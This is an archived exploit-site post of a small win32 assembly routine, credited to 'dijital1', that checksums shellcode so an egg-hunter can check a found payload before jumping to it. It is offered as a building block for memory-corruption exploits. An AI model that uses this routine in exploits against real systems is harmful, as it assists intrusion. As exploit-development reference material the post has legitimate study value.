win32/xp Checksum Routine shellcode 122 bytes
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>win32/xp Checksum Routine shellcode 122 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
win32/xp Checksum Routine shellcode 122 bytes
=============================================
;Exploit Title: Shellcode Checksum Routine
;Date: Sept 1 2010
;Author: dijital1
;Software Link: http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm
;Tested on: Omelet Hunter Shellcode in MSF
;"|——————————————————————|"
;"| __ __ |"
;"| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
;"| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
;"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
;"| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |"
;"| |"
;"| http://www.corelan.be:8800 |"
;"| security@corelan.be |"
;"| |"
;"|————————————————-[ EIP Hunters ]–|"
;" -= Egg Hunter Checksum Routine – dijital1 =- "
[BITS 32]
;Author: Ron Henry – dijital1
;Email: rlh@ciphermonk.net
;Site: http://www.ciphermonk.net
;Greetz to Exploit-db and Team Corelan
;Ok… couple of assumptions with this code. First, we’re using a single
;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a
;collision.
;We consider this a worthwhile risk given the overall size of the code; 18 bytes.
;There are a couple ways to implement this, but a good example is how it
;was used in Peter Van Eeckhoutte’s omelet egghunter mixin that was recently
;added to the Metasploit Framework.
;We’re using a 1 byte footer at the end of the shellcode that contains the
;checksum generated at shellcode creation.
; Variables eax: accumulator
; edx: points to current byte in shellcode
; ecx: counter
egg_size equ 0×7a ;we’re testing 122 bytes in this instance
find_egg:
xor ecx, ecx ;zero the counter
xor eax, eax ;zero the accumlator
calc_chksum_loop:
add al, byte [edx+ecx] ;add the byte to running total
inc ecx ;increment the counter
cmp cl, egg_size ;cmp counter to egg_size
jnz calc_chksum_loop ;if it’s not equal repeat
test_ckksum:
cmp al, byte [edx+ecx] ;cmp eax with 1 byte checksum
jnz find_egg ;search for another egg if checksum is bogus
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-09-02]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13959
Leave a Reply